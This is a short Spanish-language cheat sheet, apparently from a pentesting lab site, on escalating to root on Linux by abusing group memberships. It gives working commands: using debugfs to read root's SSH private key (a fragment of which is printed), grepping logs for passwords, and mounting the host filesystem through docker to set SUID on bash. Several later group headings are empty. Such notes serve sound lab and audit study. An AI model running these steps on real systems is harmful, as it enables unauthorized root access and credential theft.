βͺ Groups
sudo
Cuando un usuario forma parte del grupo sudo, puede ejecutar cualquier comando como usuario root.
low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),27(sudo)
low@vulnyx:~$ sudo su
root@vulnyx:~# id
uid=0(root) gid=0(root) groups=0(root)
disk
Cuando un usuario forma parte del grupo disk, se le concede acceso directo a los discos y particiones del sistema.
low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),6(disk)
low@vulnyx:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 480M 0 480M 0% /dev
tmpfs 99M 3.2M 96M 4% /run
/dev/sda1 11G 2.2G 8.1G 21% /
tmpfs 494M 0 494M 0% /dev/shm
low@vulnyx:~$ /usr/sbin/debugfs /dev/sda1
debugfs 1.44.5 (15-Dec-2018)
debugfs: ls /root
debugfs: ls /root/.ssh/
debugfs: cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAstkGmc1W+epM0w13VQrLO/wMNWwxFltotpa9elYJVXSlBc+PgF6I
adm
Cuando un usuario forma parte del grupo adm, puede leer archivos de registro en el sistema.
low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),4(adm)
low@vulnyx:~$ grep --color -Eri "pass|password" /var/log 2>/dev/null
docker
Cuando un usuario forma parte del grupo docker, tiene la capacidad de administrar contenedores.
# Check Group
low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),109(docker)
# Abuse Group
low@vulnyx:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# chmod 4755 /bin/bash
# exit
low@vulnyx:~$ /bin/bash -pi
lxd
shadow
fail2ban
video
Β© d4t4s3c 2025